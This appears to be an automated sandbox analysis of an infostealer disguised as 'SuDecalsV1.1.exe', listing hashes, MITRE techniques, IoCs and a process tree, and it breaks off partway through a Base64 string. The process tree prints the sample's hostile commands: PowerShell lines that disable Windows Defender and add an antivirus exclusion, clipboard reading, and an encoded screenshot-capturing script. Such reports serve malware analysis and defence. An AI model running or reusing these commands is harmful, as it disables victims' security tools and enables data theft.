b3519f17ea2c9a3f53cfa58144d7da3bf93abeb20039e875e602a72bc0faeb85

Analysis

max time kernel
149s
max time network
153s
platform
windows10-1703_x64
resource
win10-20230831-en
resource tags

arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system
submitted
03-09-2023 14:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SuDecalsV1.1.exe
Size

7.0MB
MD5

c56b5bfb0a49c807354426c9220fb130
SHA1

7df9b0678a79e6df5fa185fe79de0d8917969af1
SHA256

b3519f17ea2c9a3f53cfa58144d7da3bf93abeb20039e875e602a72bc0faeb85
SHA512

4d8cbfe71b2d6364122fe76096b34cb1b215240defe430f17615306f569f268f5037525695bf8322a24899d81f15a5e912ad1f68a754f06dd654b4f5a2afc8be
SSDEEP

196608:Z5SSQsGbT/9bvLz3S1bA329OqwGe6FUfWh:bGbTlj3S1bO29OqRBL

Score

7^/10

spyware stealer upx

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
4824	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe
1328	SuDecalsV1.1.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000001afbb-25.dat	upx
behavioral1/files/0x000600000001afbb-26.dat	upx
behavioral1/memory/1328-29-0x00007FF8F78F0000-0x00007FF8F7ED9000-memory.dmp	upx
behavioral1/files/0x000600000001afbf-31.dat	upx
behavioral1/files/0x000600000001afbf-32.dat	upx
behavioral1/files/0x000600000001afb0-33.dat	upx
behavioral1/files/0x000600000001afb9-36.dat	upx
behavioral1/files/0x000600000001afb9-35.dat	upx
behavioral1/memory/1328-37-0x00007FF90A510000-0x00007FF90A520000-memory.dmp	upx
behavioral1/files/0x000600000001afb0-34.dat	upx
behavioral1/memory/1328-39-0x00007FF90A4C0000-0x00007FF90A4CF000-memory.dmp	upx
behavioral1/files/0x000600000001afb3-40.dat	upx
behavioral1/memory/1328-41-0x00007FF906D60000-0x00007FF906D83000-memory.dmp	upx
behavioral1/files/0x000600000001afb3-38.dat	upx
behavioral1/memory/1328-42-0x00007FF906D30000-0x00007FF906D5D000-memory.dmp	upx
behavioral1/files/0x000700000001afaf-43.dat	upx
behavioral1/memory/1328-45-0x00007FF906BD0000-0x00007FF906BE9000-memory.dmp	upx
behavioral1/files/0x000700000001afaf-44.dat	upx
behavioral1/files/0x000600000001afb6-46.dat	upx
behavioral1/memory/1328-49-0x00007FF906BA0000-0x00007FF906BC3000-memory.dmp	upx
behavioral1/files/0x000600000001afb6-47.dat	upx
behavioral1/files/0x000600000001afbe-48.dat	upx
behavioral1/files/0x000600000001afbe-50.dat	upx
behavioral1/memory/1328-51-0x00007FF906730000-0x00007FF9068A7000-memory.dmp	upx
behavioral1/files/0x000600000001afb5-52.dat	upx
behavioral1/memory/1328-54-0x00007FF906B80000-0x00007FF906B99000-memory.dmp	upx
behavioral1/files/0x000600000001afb5-53.dat	upx
behavioral1/files/0x000600000001afbd-55.dat	upx
behavioral1/files/0x000600000001afbd-56.dat	upx
behavioral1/memory/1328-57-0x00007FF90A490000-0x00007FF90A49D000-memory.dmp	upx
behavioral1/files/0x000600000001afb7-58.dat	upx
behavioral1/files/0x000600000001afb7-59.dat	upx
behavioral1/files/0x000600000001afb8-60.dat	upx
behavioral1/files/0x000600000001afba-61.dat	upx
behavioral1/memory/1328-62-0x00007FF8F78F0000-0x00007FF8F7ED9000-memory.dmp	upx
behavioral1/files/0x000600000001afba-64.dat	upx
behavioral1/files/0x000600000001afb8-66.dat	upx
behavioral1/memory/1328-63-0x00007FF906B50000-0x00007FF906B7E000-memory.dmp	upx
behavioral1/memory/1328-68-0x00007FF8F7570000-0x00007FF8F78E8000-memory.dmp	upx
behavioral1/files/0x000600000001afb2-70.dat	upx
behavioral1/memory/1328-69-0x00007FF906A90000-0x00007FF906B48000-memory.dmp	upx
behavioral1/files/0x000600000001afb4-73.dat	upx
behavioral1/files/0x000600000001afb4-74.dat	upx
behavioral1/memory/1328-75-0x00007FF906D20000-0x00007FF906D2D000-memory.dmp	upx
behavioral1/memory/1328-72-0x00007FF906A70000-0x00007FF906A84000-memory.dmp	upx
behavioral1/files/0x000600000001afb2-71.dat	upx
behavioral1/files/0x000600000001afb8-65.dat	upx
behavioral1/files/0x000600000001afc0-76.dat	upx
behavioral1/files/0x000600000001afc0-77.dat	upx
behavioral1/memory/1328-78-0x00007FF906D60000-0x00007FF906D83000-memory.dmp	upx
behavioral1/memory/1328-79-0x00007FF905FC0000-0x00007FF9060DC000-memory.dmp	upx
behavioral1/memory/1328-82-0x00007FF906BA0000-0x00007FF906BC3000-memory.dmp	upx
behavioral1/memory/1328-108-0x00007FF906730000-0x00007FF9068A7000-memory.dmp	upx
behavioral1/memory/1328-124-0x00007FF906B80000-0x00007FF906B99000-memory.dmp	upx
behavioral1/memory/1328-172-0x00007FF906B50000-0x00007FF906B7E000-memory.dmp	upx
behavioral1/memory/1328-185-0x00007FF8F7570000-0x00007FF8F78E8000-memory.dmp	upx
behavioral1/memory/1328-186-0x00007FF906A90000-0x00007FF906B48000-memory.dmp	upx
behavioral1/memory/1328-245-0x00007FF8F78F0000-0x00007FF8F7ED9000-memory.dmp	upx
behavioral1/memory/1328-256-0x00007FF906D60000-0x00007FF906D83000-memory.dmp	upx
behavioral1/memory/1328-357-0x00007FF8F78F0000-0x00007FF8F7ED9000-memory.dmp	upx
behavioral1/memory/1328-371-0x00007FF906D60000-0x00007FF906D83000-memory.dmp	upx
behavioral1/memory/1328-376-0x00007FF906730000-0x00007FF9068A7000-memory.dmp	upx
behavioral1/memory/1328-540-0x00007FF8F78F0000-0x00007FF8F7ED9000-memory.dmp	upx
behavioral1/memory/1328-553-0x00007FF906A70000-0x00007FF906A84000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3476	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
5056	tasklist.exe
3476	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1208	systeminfo.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133382232839883607"	chrome.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
4736	powershell.exe
4736	powershell.exe
3472	powershell.exe
3472	powershell.exe
4276	chrome.exe
4276	chrome.exe
1592	powershell.exe
1592	powershell.exe
4736	powershell.exe
3472	powershell.exe
4276	chrome.exe
1592	powershell.exe
3472	powershell.exe
4736	powershell.exe
4276	chrome.exe
1592	powershell.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
316	powershell.exe
316	powershell.exe
316	powershell.exe
316	powershell.exe
4168	powershell.exe
4168	powershell.exe
4168	powershell.exe
4168	powershell.exe
3912	powershell.exe
3912	powershell.exe
3912	powershell.exe
3912	powershell.exe
2008	powershell.exe
2008	powershell.exe
2008	powershell.exe
2008	powershell.exe
4504	chrome.exe
4504	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

pid	Process
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1532	chrome.exe
Token: SeSecurityPrivilege	1532	chrome.exe
Token: SeTakeOwnershipPrivilege	1532	chrome.exe
Token: SeLoadDriverPrivilege	1532	chrome.exe
Token: SeSystemProfilePrivilege	1532	chrome.exe
Token: SeSystemtimePrivilege	1532	chrome.exe
Token: SeProfSingleProcessPrivilege	1532	chrome.exe
Token: SeIncBasePriorityPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeBackupPrivilege	1532	chrome.exe
Token: SeRestorePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeDebugPrivilege	1532	chrome.exe
Token: SeSystemEnvironmentPrivilege	1532	chrome.exe
Token: SeRemoteShutdownPrivilege	1532	chrome.exe
Token: SeUndockPrivilege	1532	chrome.exe
Token: SeManageVolumePrivilege	1532	chrome.exe
Token: 33	1532	chrome.exe
Token: 34	1532	chrome.exe
Token: 35	1532	chrome.exe
Token: 36	1532	chrome.exe
Token: SeDebugPrivilege	5056	tasklist.exe
Token: SeDebugPrivilege	3476	tasklist.exe
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeDebugPrivilege	1592	powershell.exe
Token: SeDebugPrivilege	4276	chrome.exe
Token: SeIncreaseQuotaPrivilege	1532	chrome.exe
Token: SeSecurityPrivilege	1532	chrome.exe
Token: SeTakeOwnershipPrivilege	1532	chrome.exe
Token: SeLoadDriverPrivilege	1532	chrome.exe
Token: SeSystemProfilePrivilege	1532	chrome.exe
Token: SeSystemtimePrivilege	1532	chrome.exe
Token: SeProfSingleProcessPrivilege	1532	chrome.exe
Token: SeIncBasePriorityPrivilege	1532	chrome.exe
Token: SeCreatePagefilePrivilege	1532	chrome.exe
Token: SeBackupPrivilege	1532	chrome.exe
Token: SeRestorePrivilege	1532	chrome.exe
Token: SeShutdownPrivilege	1532	chrome.exe
Token: SeDebugPrivilege	1532	chrome.exe
Token: SeSystemEnvironmentPrivilege	1532	chrome.exe
Token: SeRemoteShutdownPrivilege	1532	chrome.exe
Token: SeUndockPrivilege	1532	chrome.exe
Token: SeManageVolumePrivilege	1532	chrome.exe
Token: 33	1532	chrome.exe
Token: 34	1532	chrome.exe
Token: 35	1532	chrome.exe
Token: 36	1532	chrome.exe
Token: SeIncreaseQuotaPrivilege	1592	powershell.exe
Token: SeSecurityPrivilege	1592	powershell.exe
Token: SeTakeOwnershipPrivilege	1592	powershell.exe
Token: SeLoadDriverPrivilege	1592	powershell.exe
Token: SeSystemProfilePrivilege	1592	powershell.exe
Token: SeSystemtimePrivilege	1592	powershell.exe
Token: SeProfSingleProcessPrivilege	1592	powershell.exe
Token: SeIncBasePriorityPrivilege	1592	powershell.exe
Token: SeCreatePagefilePrivilege	1592	powershell.exe
Token: SeBackupPrivilege	1592	powershell.exe
Token: SeRestorePrivilege	1592	powershell.exe
Token: SeShutdownPrivilege	1592	powershell.exe
Token: SeDebugPrivilege	1592	powershell.exe
Token: SeSystemEnvironmentPrivilege	1592	powershell.exe
Token: SeRemoteShutdownPrivilege	1592	powershell.exe
Token: SeUndockPrivilege	1592	powershell.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe
5012	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2920 wrote to memory of 1328	2920	SuDecalsV1.1.exe	70
PID 2920 wrote to memory of 1328	2920	SuDecalsV1.1.exe	70
PID 1328 wrote to memory of 4168	1328	SuDecalsV1.1.exe	73
PID 1328 wrote to memory of 4168	1328	SuDecalsV1.1.exe	73
PID 1328 wrote to memory of 2720	1328	SuDecalsV1.1.exe	72
PID 1328 wrote to memory of 2720	1328	SuDecalsV1.1.exe	72
PID 1328 wrote to memory of 652	1328	SuDecalsV1.1.exe	75
PID 1328 wrote to memory of 652	1328	SuDecalsV1.1.exe	75
PID 1328 wrote to memory of 2872	1328	SuDecalsV1.1.exe	81
PID 1328 wrote to memory of 4424	1328	SuDecalsV1.1.exe	77
PID 1328 wrote to memory of 2872	1328	SuDecalsV1.1.exe	81
PID 1328 wrote to memory of 4424	1328	SuDecalsV1.1.exe	77
PID 1328 wrote to memory of 1020	1328	SuDecalsV1.1.exe	110
PID 1328 wrote to memory of 1020	1328	SuDecalsV1.1.exe	110
PID 1328 wrote to memory of 2668	1328	SuDecalsV1.1.exe	78
PID 1328 wrote to memory of 2668	1328	SuDecalsV1.1.exe	78
PID 1328 wrote to memory of 4484	1328	SuDecalsV1.1.exe	79
PID 1328 wrote to memory of 4484	1328	SuDecalsV1.1.exe	79
PID 1328 wrote to memory of 3352	1328	SuDecalsV1.1.exe	80
PID 1328 wrote to memory of 3352	1328	SuDecalsV1.1.exe	80
PID 652 wrote to memory of 5056	652	cmd.exe	89
PID 652 wrote to memory of 5056	652	cmd.exe	89
PID 1020 wrote to memory of 1532	1020	Conhost.exe	123
PID 1020 wrote to memory of 1532	1020	Conhost.exe	123
PID 4424 wrote to memory of 4736	4424	cmd.exe	91
PID 4424 wrote to memory of 4736	4424	cmd.exe	91
PID 2872 wrote to memory of 3476	2872	cmd.exe	92
PID 2872 wrote to memory of 3476	2872	cmd.exe	92
PID 3352 wrote to memory of 4128	3352	cmd.exe	95
PID 3352 wrote to memory of 4128	3352	cmd.exe	95
PID 4484 wrote to memory of 1208	4484	cmd.exe	94
PID 4484 wrote to memory of 1208	4484	cmd.exe	94
PID 2668 wrote to memory of 3472	2668	cmd.exe	93
PID 2668 wrote to memory of 3472	2668	cmd.exe	93
PID 2720 wrote to memory of 4276	2720	cmd.exe	132
PID 2720 wrote to memory of 4276	2720	cmd.exe	132
PID 4168 wrote to memory of 1592	4168	powershell.exe	97
PID 4168 wrote to memory of 1592	4168	powershell.exe	97
PID 1328 wrote to memory of 1868	1328	SuDecalsV1.1.exe	99
PID 1328 wrote to memory of 1868	1328	SuDecalsV1.1.exe	99
PID 1868 wrote to memory of 4260	1868	cmd.exe	101
PID 1868 wrote to memory of 4260	1868	cmd.exe	101
PID 1328 wrote to memory of 4688	1328	SuDecalsV1.1.exe	102
PID 1328 wrote to memory of 4688	1328	SuDecalsV1.1.exe	102
PID 4688 wrote to memory of 4036	4688	cmd.exe	104
PID 4688 wrote to memory of 4036	4688	cmd.exe	104
PID 1328 wrote to memory of 1176	1328	SuDecalsV1.1.exe	105
PID 1328 wrote to memory of 1176	1328	SuDecalsV1.1.exe	105
PID 1176 wrote to memory of 2776	1176	cmd.exe	107
PID 1176 wrote to memory of 2776	1176	cmd.exe	107
PID 1328 wrote to memory of 4184	1328	SuDecalsV1.1.exe	109
PID 1328 wrote to memory of 4184	1328	SuDecalsV1.1.exe	109
PID 3472 wrote to memory of 2212	3472	powershell.exe	111
PID 3472 wrote to memory of 2212	3472	powershell.exe	111
PID 4184 wrote to memory of 4760	4184	cmd.exe	112
PID 4184 wrote to memory of 4760	4184	cmd.exe	112
PID 2212 wrote to memory of 2752	2212	csc.exe	115
PID 2212 wrote to memory of 2752	2212	csc.exe	115
PID 5012 wrote to memory of 4540	5012	chrome.exe	116
PID 5012 wrote to memory of 4540	5012	chrome.exe	116
PID 1328 wrote to memory of 4880	1328	SuDecalsV1.1.exe	117
PID 1328 wrote to memory of 4880	1328	SuDecalsV1.1.exe	117
PID 4880 wrote to memory of 208	4880	cmd.exe	119
PID 4880 wrote to memory of 208	4880	cmd.exe	119

C:\Users\Admin\AppData\Local\Temp\SuDecalsV1.1.exe
"C:\Users\Admin\AppData\Local\Temp\SuDecalsV1.1.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2920
- C:\Users\Admin\AppData\Local\Temp\SuDecalsV1.1.exe
  "C:\Users\Admin\AppData\Local\Temp\SuDecalsV1.1.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      PID:4276
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SuDecalsV1.1.exe'"
    3⤵
    PID:4168
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SuDecalsV1.1.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:652
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4424
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2668
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpA